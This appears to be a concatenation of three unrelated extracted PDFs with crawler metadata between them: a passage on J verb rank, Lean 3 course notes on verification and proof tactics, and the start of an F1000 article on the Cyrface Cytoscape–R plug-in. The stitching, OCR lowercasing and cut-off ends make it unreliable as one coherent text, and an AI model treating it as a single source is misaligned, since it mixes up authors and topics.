them: ```j x1- x0 ``` ```j |length error | x1 -x0 ``` The interpreter is trying to subtract the first element from $x_1$ from the first element of $x_0$, then subtract the second element from $x_1$ from the second element of $x_0$, and so on. However, while $x_0$ has six 0-cell elements, $x_1$ only has one element, which is a 2-cell. However it does not seem unreasonable to want to perform arithmetic operations on $x_0$ and $x_1$, as they both contain six numbers. We can control the rank attribute of a verb, thereby enabling us to perform arithmetic on both $x_0$ and $x_1$. We will return to this example in Chapter 3 when we cover conjunctions. ### 2.7 Summary In this chapter we have introduced some of the basic concepts of programming in J. J functions are called verbs. The primitive verbs are (mostly) designated by a single punctuation character (+) or a pair of punctuation characters (+:), though a few use alphabetic characters (i.). Verbs can be monadic (one argument) or dyadic (two arguments). Data objects have properties of rank (dimension) and shape. All objects can be thought of as arrays. Atoms (0-cell), lists (1-cell) or tables (2-cell) are merely special instances of arrays ranked (dimensioned) zero, one and two, respectively. Furthermore any $n$ ranked array can be thought of as a list of $n-1$ cell objects. Note that, an atom has an empty shape and is different from a one-item list. Furthermore, a list is different from a $1 \times n$ table. Verbs have rank attributes that determine at what cell level they operate. Network Performance Analysis Using the J Programming Language Holt, A. 2008, XVI, 216 p., Hardcover ISBN: 978-1-84628-822-7
{"Source-Url": "https://www.springer.com/cda/content/document/cda_downloaddocument/9781846288227-c2.pdf?SGWID=0-0-45-452105-p173721714", "len_cl100k_base": 6966, "olmocr-version": "0.1.53", "pdf-total-pages": 15, "total-fallback-pages": 0, "total-input-tokens": 31186, "total-output-tokens": 7916, "length": "2e12", "weborganizer": {"__label__adult": 0.0002467632293701172, "__label__art_design": 0.0002951622009277344, "__label__crime_law": 0.0002472400665283203, "__label__education_jobs": 0.001331329345703125, "__label__entertainment": 7.748603820800781e-05, "__label__fashion_beauty": 0.00010192394256591796, "__label__finance_business": 0.0002148151397705078, "__label__food_dining": 0.0003426074981689453, "__label__games": 0.00041103363037109375, "__label__hardware": 0.00092315673828125, "__label__health": 0.0003893375396728515, "__label__history": 0.00021851062774658203, "__label__home_hobbies": 0.00012034177780151369, "__label__industrial": 0.00046753883361816406, "__label__literature": 0.0003266334533691406, "__label__politics": 0.00020563602447509768, "__label__religion": 0.00041294097900390625, "__label__science_tech": 0.054534912109375, "__label__social_life": 0.00010985136032104492, "__label__software": 0.016021728515625, "__label__software_dev": 0.92236328125, "__label__sports_fitness": 0.00022161006927490232, "__label__transportation": 0.0004148483276367187, "__label__travel": 0.00016629695892333984}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 21397, 0.15966]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 21397, 0.23601]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 21397, 0.81782]], "google_gemma-3-12b-it_contains_pii": [[0, 1204, false], [1204, 2134, null], [2134, 3385, null], [3385, 5017, null], [5017, 6948, null], [6948, 7955, null], [7955, 9328, null], [9328, 10992, null], [10992, 12572, null], [12572, 14060, null], [14060, 15552, null], [15552, 16962, null], [16962, 18989, null], [18989, 21274, null], [21274, 21397, null]], "google_gemma-3-12b-it_is_public_document": [[0, 1204, true], [1204, 2134, null], [2134, 3385, null], [3385, 5017, null], [5017, 6948, null], [6948, 7955, null], [7955, 9328, null], [9328, 10992, null], [10992, 12572, null], [12572, 14060, null], [14060, 15552, null], [15552, 16962, null], [16962, 18989, null], [18989, 21274, null], [21274, 21397, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 21397, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 21397, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 21397, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 21397, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 21397, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 21397, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 21397, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 21397, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 21397, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, true], [5000, 21397, null]], "pdf_page_numbers": [[0, 1204, 1], [1204, 2134, 2], [2134, 3385, 3], [3385, 5017, 4], [5017, 6948, 5], [6948, 7955, 6], [7955, 9328, 7], [9328, 10992, 8], [10992, 12572, 9], [12572, 14060, 10], [14060, 15552, 11], [15552, 16962, 12], [16962, 18989, 13], [18989, 21274, 14], [21274, 21397, 15]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 21397, 0.03191]]}
olmocr_science_pdfs
2024-12-10
2024-12-10
a522295649ebe7d31c198252d357df0525963ff1
1 Software Our modern societies heavily depend on software, and this dependence is likely to grow. Software is important, and it is also beautifully complex. It is complex first because of its sheer size: estimates place Google’s software at about 2 billion lines of code, and Microsoft’s Windows operating system at about 50 million lines of code\(^1\); a pacemaker has about 100 thousand lines of code, the Boeing 787 airplane has more than 10 million, and a modern high-end car has about 100 million\(^2\); some estimates place the size of new software produced every year to the hundreds of billions of lines of code\(^3\). But even very small programs can be extremely complex. The famous Collatz conjecture states that the following program terminates for all possible inputs: \[ \begin{aligned} n &:= \text{input a natural number}; \\ \text{while } (n > 1) \\ & \quad \text{if } (n \ \text{is even}) \\ & \quad \quad n := n/2; \\ & \quad \text{else} \\ & \quad \quad n := 3n + 1; \end{aligned} \] The Collatz conjecture is an open problem in mathematics.\(^4\) It is a conjecture (i.e., something we believe is true), but not a theorem (i.e., not something we have proven). The fact that this 6-line program defies the understanding of our best mathematicians tells us that there is something inherently complex and challenging about software. Software is the most complex artifact that humans have ever constructed. Understanding software is an important intellectual challenge for humanity. 2 Software Science Science is knowledge that helps us make predictions. The key word is predictions. The stronger the science, the stronger the predictions it can make. Software science helps us make predictions about the programs that we write. Will my program terminate? Is my program correct? What does correct even mean? Will my program produce a correct output? When exactly is an output correct? Should the input satisfy any conditions in order for the output to be correct? Etc. \(^1\) According to \url{https://www.wired.com/2015/09/google-2-billion-lines-code-and-one-place/}. \(^2\) According to \url{https://www.visualcapitalist.com/millions-lines-of-code/}. \(^3\) According to \url{https://cybersecurityventures.com/application-security-report-2017/}. \(^4\) If you solve it, you will become famous. See also: \url{https://www.quantamagazine.org/can-computers-solve-the-collatz-conjecture-20200826/} (thanks to Samuel Lowe for suggesting this article). 3 This Course **Testing and proving:** This course is an introduction to the science of software. You have already written programs. You have taken and will take more courses that teach you how to program. In most programming courses you will focus on checking program correctness by testing. Testing is very important, but as Dijkstra famously said: “Program testing can be used to show the presence of bugs, but never to show their absence!” In this course we focus on proving program correctness. Proving is a stronger guarantee than testing. Testing checks only some inputs, whereas a proof is usually about all possible inputs. So proofs offer stronger predictions about our programs. **Logic:** But in order to prove that a program is correct, we must first define what exactly do we mean by correct. For that, we will use logic. Logic is first of all a language. Contrary to natural languages (English, Greek, etc.), logic is precise and unambiguous. We can debate endlessly about the meaning of love and politics, but the meaning of a logical formula is not a matter of opinion. It is mathematically defined. This is very important because it helps avoid errors of communication. Miscommunication can be catastrophic in love and politics, but also in engineering projects. **Specification and verification:** In this course we will use logic for several things.\(^5\) We will use logic to express properties of programs. Collectively these properties define what it means for a program to be correct: they specify the program. This is called program specification. We will also use the rules of logic to prove those properties. Proving that a program satisfies its specification is called program verification. **In this course we will learn:** - to read functional programs with types - to write functional programs with types - to read formal specifications written in logic - to write formal specifications in logic - to read proofs - to write proofs. **LEAN:** This semester, we will use the LEAN theorem prover: [https://leanprover.github.io/](https://leanprover.github.io/). We will write programs in LEAN’s programming language, we will write specifications in LEAN’s logic, and we will write proofs using LEAN’s proof system. Install LEAN on your personal computer as soon as you read this: **IMPORTANT: YOU SHOULD INSTALL LEAN 3, NOT LEAN 4!!!** We found most helpful the instructions provided here: [https://leanprover-community.github.io/](https://leanprover-community.github.io/). **Other theorem provers:** The goal of this course is *not* to teach you LEAN. The goal is to introduce you to the science of software, formal logic, formal specification, and formal verification. We are using LEAN as a tool and as a means to an end, rather than the end itself. LEAN is just one of many tools that could be used for this purpose. Examples of other such tools are (in alphabetical order): - ACL2s: [http://acl2s.ccs.neu.edu/](http://acl2s.ccs.neu.edu/) --- \(^5\)Logic goes far beyond what we will see in this course. Logic is the foundation of mathematics. It is also the foundation of language, reason, and philosophy. • Agda: https://wiki.portal.chalmers.se/agda/ • Coq: https://coq.inria.fr/ • Idris: https://www.idris-lang.org/ • Isabelle: https://isabelle.in.tum.de/ • PVS: https://pvs.csl.sri.com/ The above list is by no means exhaustive. This is an active area of research, and new tools are being developed or new capabilities are added to existing tools all the time. Each tool has its own pros and cons, just like different programming languages and systems have their own pros and cons. Nevertheless, some basic concepts and principles are common to all these tools. It is these concepts and principles that we strive to teach you in this course, and it is these concepts and principles that you should strive to learn. **Having fun with proofs:** Proving theorems with a tool like LEAN is a lot of fun. It’s like playing a game. The goal of the game is to prove the theorem. This is like solving a puzzle, or finding our way out of a maze. We will learn which moves to make to help us find the exit of the maze. **WARNING:** this game can become addictive! **How to succeed in this course:** You learn by experimenting, asking questions, and making mistakes. Making mistakes is great (as long as they are not catastrophic mistakes, like drinking and driving and car crashing). Fortunately, computer science provides you with a very safe environment for making mistakes: the worst that can happen is that your program doesn’t compile, or that it doesn’t return the right result. Big deal. In this course, what can go wrong? Maybe LEAN does not accept your function definition and you don’t see why. Or maybe your function doesn’t work as expected. Or you cannot complete a proof. Etc. Try to experiment to see what goes wrong. For LEAN specific things, consult the LEAN documentation. Ask questions when you are deadlocked. **There are no stupid questions.** A good way to know whether you are learning what you are supposed to be learning is whether you are **able to do all the homework problems by yourself.** If you are, you will do well in the course. If you are not, you should be worried. Come to our office hours if you are worried. 4 **These Lecture Notes** These lecture notes will be sparse. This is intentional. Their aim is not to be a comprehensive textbook, but rather to guide you in the course (like a map). The philosophy of the course is **learning by doing.** Is there any other way to learn really? In particular, these lecture notes are **not** about learning LEAN. There are many many good resources on LEAN freely available online: examples, tutorials, online textbooks, and many more. References to those will be provided as the course progresses. These lecture notes will be permanently under construction. They will be updated regularly as we advance in the course. The latest version will serve as the reference point. Please look at the date of these notes, compare it to the date in your own copy, and use the latest version. 5 **Other Reading** **Documentation on LEAN:** There is a lot of documentation available on LEAN from the following web sites: • https://leanprover.github.io/ • https://leanprover-community.github.io/ Unfortunately, there is no single document that matches exactly what we present in this course, so you will have to collect information from multiple sources. Also, much of the LEAN documentation is under construction and/or incomplete. We recommend starting with this (although there is a lot from the link below that we will not cover/emphasize in this course, like type theory, dependent types, etc., for instance): - [https://leanprover.github.io/theorem_proving_in_lean](https://leanprover.github.io/theorem_proving_in_lean) You can also consult the reference manual (unfortunately the programming part is missing): - [https://leanprover.github.io/reference/](https://leanprover.github.io/reference/) You can also look directly at the LEAN code, libraries, etc.: - [https://github.com/leanprover/lean/tree/master/library/init](https://github.com/leanprover/lean/tree/master/library/init) For those interested in using LEAN for formal mathematics, here's a couple of links: - The Future of Mathematics? talk by Kevin Buzzard: [https://www.youtube.com/watch?v=Dp-mQ3HxgDE](https://www.youtube.com/watch?v=Dp-mQ3HxgDE) (thanks to William Schultz for suggesting this link). **Type Theory:** LEAN is based on so-called *type theory* which studies *type systems*. LEAN has a type system, and many (typed) programming languages also have type systems. Type systems are fundamental in programming (languages), but also in logic and the foundation of mathematics. However, we will not study type systems nor type theory in this class, as our main focus is to learn how to do proofs by doing. Those interested in type theory can consult the references below: - *Types and Programming Languages* by Benjamin C. Pierce. - *Advanced Topics in Types and Programming Languages* by Benjamin C. Pierce, editor. - A short introduction to LEAN’s type system can be found here: [https://leanprover.github.io/theorem_proving_in_lean/dependent_type_theory.html](https://leanprover.github.io/theorem_proving_in_lean/dependent_type_theory.html). as well as relevant courses in programming languages. **Software Foundations:** [https://softwarefoundations.cis.upenn.edu/](https://softwarefoundations.cis.upenn.edu/). *Software Foundations* is a book series available online. It goes much further than we do in this course, but its first part (Volume 1) serves as good reading material for this course. *Software Foundations* uses a different theorem prover, called Coq. LEAN is quite similar to Coq, and you should be able to follow and re-do most of the things described in *Software Foundations* in LEAN. We often borrow exercises from *Software Foundations* and adapt them to our course. We thank the authors of *Software Foundations* for making the series freely available. **Other Courses:** In addition to the *Software Foundations* online series, there is a number of courses available online which are related to our course. Here’s a partial list for those interested: - *Logic and Proof* at CMU: [https://leanprover.github.io/logic_and_proof/](https://leanprover.github.io/logic_and_proof/). This course is also based on LEAN. --- This is also what you will have to do in your “real life” outside the university. logical verification at vrije universiteit amsterdam: https://lean-forward.github.io/logical-verification/2020/. this course is also based on lean. • semantics of programming languages at tu munich: http://www21.in.tum.de/teaching/semantik/ws1920/. this course is based on another theorem prover called isabelle. • formal reasoning about programs at mit: http://adam.chlipala.net/frac/. this course is based on coq. a formal methods course database is available here: https://fme-teaching.github.io/courses/ there are also regularly held summer schools and other seminars on logic and related formal techniques: • see the speaking logic material by natarajan shankar (http://fm.csl.sri.com/ssft21/speaklogicv10.pdf) as part of the summer school on formal techniques: http://fm.csl.sri.com/ssft21/. • see list here: http://user.it.uu.se/~bengt/info/summer-schools.shtml. textbooks: there is no required textbook for this course. for those interested in learning more about logic and its use in computer science in general and specification/verification in particular, here are some textbooks: • logic in computer science: modelling and reasoning about systems, by huth and ryan [10]. • handbook of practical logic and automated reasoning, by harrison [7]. • the calculus of computation - decision procedures with applications to verification, by bradley and manna [3]. for those interested in learning more about verification and formal methods: • model checking, by clarke, grumberg and peled [4]. • principles of model checking, by baier and katoen [1]. • several books on the spin model checker by holzmann [8, 9]. • books by manna and pnueli: the temporal logic of reactive and concurrent systems: specification, temporal verification of reactive systems: safety, and temporal verification of reactive systems: progress (the third is available online as an unpublished draft) [12, 13]. • handbook of model checking, by clarke, henzinger, veith, bloem [5]. other relevant books are the following: • coq’art by bertot and castéran [2]. • certified programming with dependent types by adam chlipala. available at http://adam.chlipala.net/cpdt/. • formal reasoning about programs by adam chlipala. available at http://adam.chlipala.net/frac/. • isabelle/hol – a proof assistant for higher-order logic by nipkow et al [14]. • concrete semantics with isabelle/hol by nipkow and klein. • functional algorithms, verified! by nipkow et al. The history of logic, in comics: The following is a wonderful book on the history of logic and foundations of mathematics, written by famous computer scientist Christos Papadimitriou: 6 Course Outline To be populated as we go along. 6.1 Introduction (Lectures 1 and 2) - Course goals and logistics. - Introductions. - A glimpse into LEAN and other theorem provers (Coq, Isabelle, ACL2s). 6.2 Functional Programming with Types in LEAN (Lectures 3 - 6) Programming in a functional language with types. - Basic expressions, predefined operations and types in LEAN. - `#eval`, `#reduce`, `#check`, `#print` - Defining simple non-recursive functions in LEAN. - Strong typing, type errors, and function types as input-output contracts. - Predefined types `bool`, `nat`, `int` and `list nat`. - Defining functions using pattern-matching. - Recursive functions on `nat` and `list nat`, and a word about termination. - Anonymous functions (lambda abstraction). - Booleans and functions on booleans. - Product types and currying. 6.3 Testing as Proving (Lectures 6 - 7) Writing tests as “mini-theorems” using `example`. - Introduction to proofs. - The LEAN proof environment. - The proof state, goals, and hypotheses. - The `reflexivity` tactic. - Tests = simple proofs. 6.4 Introduction to Specifications (Lecture 7) - The type Prop. - Properties and specifications. - Informal and formal specifications. - example, lemma, theorem. - sorry. 6.5 Defining new types (Lectures 7 - 8) - Defining our own types. - Constructors. - Enumerative types: the type weekday. - Inductive data types. - Defining the natural numbers: the type mynat. - Defining recursive functions on inductive data types by pattern matching (data-driven definitions). - Trees. - Helper functions. 6.6 For-All Specifications (Lecture 9) - Writing specifications with forall (\forall). - Formal specification and verification. - Diving more into proofs. - Proof tactics: intro. - try. 6.7 Equational Reasoning and Introduction to Logic (Lectures 10 - 11) - Equational reasoning. - More forall specifications. - Proof by cases. - Introduction to logic: conjunction, disjunction, negation, implication. - Proof tactics: intro (again, for implication), intros, dunfold, cases. 6.8 Review (Lectures 12 and 13) - Where we stand. - Definitions with overlapping cases. - Weird LEAN behavior. - Proof tactics: unfold, rewrite, simp, repeat. - When a tactic “applies” to a proof state. - Type coercions (are bad). - Higher-order logic. - Fermat’s last theorem. - The dangers of if-then-else. 6.9 Logic (Lectures 12 - 19) - Review of propositional (boolean) logic: syntax, semantics, truth tables, boolean functions, satisfiability, validity, ... - How many boolean functions of arity $n$ are there? - Syntax vs semantics. - bool vs Prop. - Proving propositional logic tautologies in LEAN vs. by truth table. - Negation. - If-and-only-iff (iff). - Exclusive-OR (xor). - Propositions as types, theorems as functions. - Modus ponens. - Using lemmas and theorems. - Constructive vs. classic logic. - The axioms classical.em (law of excluded middle) and classical.by.contradiction. - Proof tactics: trivial, assumption, exact, left, right, cases (again, for conjunctive and disjunctive hypotheses), split, have. 6.10 Exam 1 – 28 Oct 2021 Taken online using Gradescope. Material: everything covered so far up to and including have (see above). 6.11 Induction and Functional Induction (Lectures 20 - 25) - Proof by induction vs proof by cases. - Multiple base cases. - Multiple induction steps. - Multiple induction hypotheses. - Induction on \texttt{nats}, lists, trees, and other inductive data types. - The \texttt{induction} tactic. - Choosing the induction variable. - Effect of induction on hypotheses. - Discovering, writing, and using lemmas. - Delaying introductions. - The \texttt{revert} tactic. - Notation: \texttt{local notation}. - "Libraries": \texttt{import}. - Functional induction. - The power of generalization. - Induction schemes generated by functions. 6.12 Termination (Lectures 26 - 31) - The hardness of proving theorems. - The hardness of checking termination. - Alan Turing. - Undecidability. - Proving termination. - Measure functions. - Persuading LEAN that a function terminates. - Termination vs computational complexity. - The Hydra game. - Why program termination is important. - Why non-termination is also useful. - (Not really about termination) Dealing with tail-recursive functions. 7 Summary of Proof Tactics Here’s a summary of the proof tactics that we have learned so far in this course: 1. **reflexivity**, abbreviated **refl**: applies when the goal is of the form \( A = A \), or can be easily simplified/reduced to \( A = A \). **Intuition/justification:** \( \forall A, A = A \) ("for all \( A \), \( A \) is equal to \( A \" is an axiom of logic, called reflexivity of equality. In practice, **refl** applies also to goals that are not strictly of the form \( A = A \), but can be reduced to that form after performing computations (reductions) to the left and/or right hand sides of the equation. 2. **intro**: applies when the goal is of the form \( \forall x : T, \ldots \); eliminates \( \forall \)-quantified variable \( x \) from goal and introduces \( x : T \) into the hypotheses. **Intuition/justification:** If I have to prove something like \( \forall x : T, P \), it suffices to prove \( P \) assuming \( x \) is an arbitrary element of type \( T \). 3. **intros**: repeatedly applies **intro**. 4. **repeat \{ \ldots \}**: repeats the sequence of tactics within \{ \ldots \} as many times as it can. 5. **unfold** and **dunfold**: simplify/reduce function applications of the form \((f \, e)\) for given \( f \). If we add at \( H \) at the end, then the tactic applies to hypothesis \( H \), instead of the goal. **Intuition/justification:** If I have to prove \( P \), and \((f \, e)\) appears somewhere in \( P \), and \((f \, e) = g\) for some \( g \), then it suffices to prove \( P \) where \((f \, e)\) is replaced by \( g \). 6. **simp \[H\]**: simplifies the goal according to \( H \). \( H \) is optional: you can also just issue **simp**. Similar to **unfold**, but can simplify more. For instance, **simp** can simplify if-then-else statements, e.g., it simplifies \( \text{ite}(\, tt = \, tt\,) \, A \, B \) to \( A \). \( H \) could be a function, a hypothesis, or a previously proven lemma/theorem. We can also add multiple simplification rules, like: **simp \[H1, H2, \ldots\]**. If we add at \( A \) at the end, then the tactic applies to hypothesis \( A \), instead of the goal. **Intuition/justification:** Similar to that of **unfold/dunfold**. 7. **rewrite \[<->\] \[H\]**: rewrites the goal based on the equality or equivalence \( H \). \( H \) could be a function, a hypothesis, or a previously proven lemma/theorem. By default rewrites from left to write. If \(<-\) is added, rewrites from right to left. Abbreviated **rw**. If we add at \( A \) at the end, then the tactic applies to hypothesis \( A \), instead of the goal. **Intuition/justification:** If I rewrite based on a proven equality \( A = B \), then in order to prove goal \( G \) it suffices to prove \( G' \) which is obtained from \( G \) by substituting any occurrence of \( A \) with \( B \) (or vice versa, of \( B \) with \( A \), for **rewrite \(<-\)**). If I rewrite based on a proven equivalence \( G \Longleftrightarrow G' \) then I can replace goal \( G \) with \( G' \). If I rewrite function \( f \) and by definition of \( f \) I know that \((f \, e) = g\), then similar to the intuition/justification of **unfold/dunfold**. 8. **cases x**: --- The phrase “replaced by \( g \)” is a bit simplistic, as the rules of substitution are not as trivial as they might seem at first glance. Luckily, we don’t have to worry about defining precisely what the rules of substitution are, going over all its subtleties (free vs. bound variables, etc), in this course. The reason is that LEAN is watching over us and performs substitutions correctly on our behalf. • if \( x \) is an element of a certain data type such as \( \text{bool} \) or \( \text{nat} \), splits a proof/goal into several subproofs/subgoals depending on the type of \( x \): **Intuition/justification:** If I have to prove \( P \) assuming that \( x \) is of some inductive data type \( T \), then it suffices to prove \( P \) for each of the possible objects that \( x \) could be, based on the constructors of \( T \). • if \( x \) is a hypothesis of the form \( P \lor Q \), splits a proof/goal into two subproofs/subgoals, one where \( P \) is assumed, and another where \( Q \) is assumed; **Intuition/justification:** If I have to prove \( G \) assuming that \( P \lor Q \) holds, then it suffices to prove \( G \) in each of the two cases: Case (1): \( P \) holds, and Case (2): \( Q \) holds. • if \( x \) is a hypothesis of the form \( P \land Q \), replaces \( x \) with two hypotheses, one stating that \( P \) holds, the other stating that \( Q \) holds. **Intuition/justification:** If I have to prove \( G \) assuming that \( P \land Q \) holds, then it suffices to prove \( G \) assuming that both \( P \) holds and \( Q \) holds. If we add `with ...` at the end, then we can rename the variables or labels in the various cases. Otherwise, LEAN picks the names for us. 9. **trivial**: discharges the goal when either the goal is `true` (or “obviously true”), or one of the hypotheses is `false` (or “obviously false”). **Intuition/justification:** \( H \to \text{true} \) trivially holds for any \( H \), and \( \text{false} \to G \) trivially holds for any \( G \). 10. **assumption**: discharges the goal when one of the hypotheses is identical to the goal. **Intuition/justification:** \( G \to G \) trivially holds for any \( G \). 11. **exact \( H \)**: discharges the goal when hypothesis \( H \) is identical to the goal. **Intuition/justification:** \( G \to G \) trivially holds for any \( G \). 12. **left**: when the goal is \( P \lor Q \), transforms the goal into \( P \). **Intuition/justification:** to prove \( P \lor Q \) it suffices to prove \( P \). 13. **right**: when the goal is \( P \lor Q \), transforms the goal into \( Q \). **Intuition/justification:** to prove \( P \lor Q \) it suffices to prove \( Q \). 14. **split**: when the goal is \( P \land Q \), splits the proof/goal into two subproofs/subgoals, one for \( P \) and one for \( Q \). **Intuition/justification:** to prove \( P \land Q \) it suffices to prove \( P \) and \( Q \) separately. 15. **have \( H : P := \ldots \)**: creates the new hypothesis \( H \) that \( P \) holds. We must then prove \( P \), by filling in the \( \ldots \) with a proof. **Intuition/justification:** to prove \( G \) from hypotheses \( H_1, H_2, \ldots \), it suffices to (1) prove a new goal \( P \) from hypotheses \( H_1, H_2, \ldots \), and then (2) prove \( G \) using the existing hypotheses \( H_1, H_2, \ldots \) plus the newly proved result \( H \) that \( P \) holds. 16. **induction \( x \)**: if \( x \) is an element of a certain inductive data type \( T \), perform induction on \( x \). Generates several proof obligations and the corresponding induction hypotheses depending on the constructors of \( T \). **Intuition/justification:** If I have to prove \( P \) assuming that \( x : T \), then it suffices to prove \( P \) for each of the possible objects that \( x \) could be, based on the constructors of \( T \). In doing so, I can assume that \( P \) holds for all previously/already constructed objects of type \( T \), in order to prove \( P \) for a newly constructed object of type \( T \). See also comments in lecture code 20-code.lean. 17. **revert \( x \)**: if \( x : T \) is a variable of some data type \( T \) like \( \text{nat} \), \( \text{bool} \), etc, puts \( x \) back into the goal as \( \forall x \ldots ; \) if \( x : P \) is a hypothesis of some proposition \( P \), puts \( P \) back into the goal as \( P \to \ldots \). 8 Allowed LEAN Library Axioms/Theorems In your proofs, you are allowed to appeal to the following from the LEAN library:\(^8\) ```lean #check and_comm #check or_comm #check or_false #check false_or #check or_true #check true_or #check and_true #check true_and #check and_false #check false_and ``` ```lean #check band_ff #check band_tt #check bor_ff #check bor_tt #check ff_band #check ff_bor #check tt_band #check tt_bor ``` In addition to the above results from the LEAN library, you are also allowed to use any result previously proven in class, including in lectures, labs, homeworks, etc. For instance, you are allowed to use anything in given `ourlibrary24.lean` and all lecture and homework files uploaded on canvas. You are also allowed to copy your own solutions from past homeworks, define your own helper functions, define and prove your own theorems and lemmas, etc. References \(^8\)If there is a result missing from the list that you think is reasonably basic and should be included, please let Stavros know.
{"Source-Url": "https://course.ccs.neu.edu/cs2800f21/lecture-notes.pdf", "len_cl100k_base": 6929, "olmocr-version": "0.1.48", "pdf-total-pages": 13, "total-fallback-pages": 0, "total-input-tokens": 33182, "total-output-tokens": 8733, "length": "2e12", "weborganizer": {"__label__adult": 0.0006475448608398438, "__label__art_design": 0.00139617919921875, "__label__crime_law": 0.0006346702575683594, "__label__education_jobs": 0.04681396484375, "__label__entertainment": 0.00028443336486816406, "__label__fashion_beauty": 0.00036406517028808594, "__label__finance_business": 0.0004525184631347656, "__label__food_dining": 0.0010595321655273438, "__label__games": 0.0022430419921875, "__label__hardware": 0.0010995864868164062, "__label__health": 0.0008673667907714844, "__label__history": 0.0006723403930664062, "__label__home_hobbies": 0.0004284381866455078, "__label__industrial": 0.0009088516235351562, "__label__literature": 0.001766204833984375, "__label__politics": 0.0004916191101074219, "__label__religion": 0.0013151168823242188, "__label__science_tech": 0.07452392578125, "__label__social_life": 0.0004935264587402344, "__label__software": 0.01413726806640625, "__label__software_dev": 0.84765625, "__label__sports_fitness": 0.0006022453308105469, "__label__transportation": 0.0009226799011230468, "__label__travel": 0.00033545494079589844}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 30279, 0.01359]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 30279, 0.59039]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 30279, 0.87397]], "google_gemma-3-12b-it_contains_pii": [[0, 2473, false], [2473, 5625, null], [5625, 8785, null], [8785, 12573, null], [12573, 15313, null], [15313, 16672, null], [16672, 17649, null], [17649, 18810, null], [18810, 19962, null], [19962, 23614, null], [23614, 27597, null], [27597, 29453, null], [29453, 30279, null]], "google_gemma-3-12b-it_is_public_document": [[0, 2473, true], [2473, 5625, null], [5625, 8785, null], [8785, 12573, null], [12573, 15313, null], [15313, 16672, null], [16672, 17649, null], [17649, 18810, null], [18810, 19962, null], [19962, 23614, null], [23614, 27597, null], [27597, 29453, null], [29453, 30279, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 30279, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, true], [5000, 30279, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 30279, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 30279, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, true], [5000, 30279, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 30279, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 30279, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 30279, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 30279, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 30279, null]], "pdf_page_numbers": [[0, 2473, 1], [2473, 5625, 2], [5625, 8785, 3], [8785, 12573, 4], [12573, 15313, 5], [15313, 16672, 6], [16672, 17649, 7], [17649, 18810, 8], [18810, 19962, 9], [19962, 23614, 10], [23614, 27597, 11], [27597, 29453, 12], [29453, 30279, 13]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 30279, 0.0]]}
olmocr_science_pdfs
2024-11-25
2024-11-25
a9092b17261a2b0fc13847db7509ef687000b2c5
WEB TOOL **Cyrface: An interface from Cytoscape to R that provides a user interface to R packages [version 1; referees: 2 approved, 1 approved with reservations]** Emanuel Gonçalves, Julio Saez-Rodriguez The European Molecular Biology Laboratory, European Bioinformatics Institute, Cambridge, CB1 1SD, UK --- **Abstract** There is an increasing number of software packages to analyse biological experimental data in the R environment. In particular, Bioconductor, a repository of curated R packages, is one of the most comprehensive resources for bioinformatics and biostatistics. The use of these packages is increasing, but it requires a basic understanding of the R language, as well as the syntax of the specific package used. The availability of user graphical interfaces for these packages would decrease the learning curve and broaden their application. Here, we present a Cytoscape plug-in termed **Cyrface** that allows Cytoscape plug-ins to connect to any function and package developed in R. **Cyrface** can be used to run R packages from within the Cytoscape environment making use of a graphical user interface. Moreover, it links the R packages with the capabilities of Cytoscape and its plug-ins, in particular network visualization and analysis. **Cyrface**’s utility has been demonstrated for two Bioconductor packages (CellNOptR and DrugVsDisease), and here we further illustrate its usage by implementing a workflow of data analysis and visualization. Download links, installation instructions and user guides can be accessed from the **Cyrface** homepage (http://www.ebi.ac.uk/saezrodriguez/cyrface/). --- This article is included in the Cytoscape Apps gateway. --- This article is included in the EMBL-EBI gateway. This article is included in the RPackage gateway. This article is included in the Bioconductor gateway. Corresponding author: Julio Saez-Rodriguez (cyrface@ebi.ac.uk) Competing interests: No competing interests were disclosed. How to cite this article: Gonçalves E and Saez-Rodriguez J. Cyface: An interface from Cytoscape to R that provides a user interface to R packages [version 1; referees: 2 approved, 1 approved with reservations] F1000Research 2013, 2:192 (doi: 10.12688/f1000research.2-192.v1) Copyright: © 2013 Gonçalves E and Saez-Rodriguez J. This is an open access article distributed under the terms of the Creative Commons Attribution Licence, which permits unrestricted use, distribution, and reproduction in any medium, provided the original work is properly 